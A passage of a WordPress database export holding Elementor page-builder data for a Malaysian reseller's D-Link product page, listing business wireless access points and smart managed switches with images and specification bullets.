Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7424,3389,'_elementor_version','2.5.14'),(7425,3389,'_elementor_edit_mode','builder'),(7428,3390,'_wp_page_template','template-fullwidth.php'),(7429,3390,'_elementor_template_type','post'),(7430,3390,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"290\",\"right\":\"290\",\"bottom\":\"290\",\"left\":\"290\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" 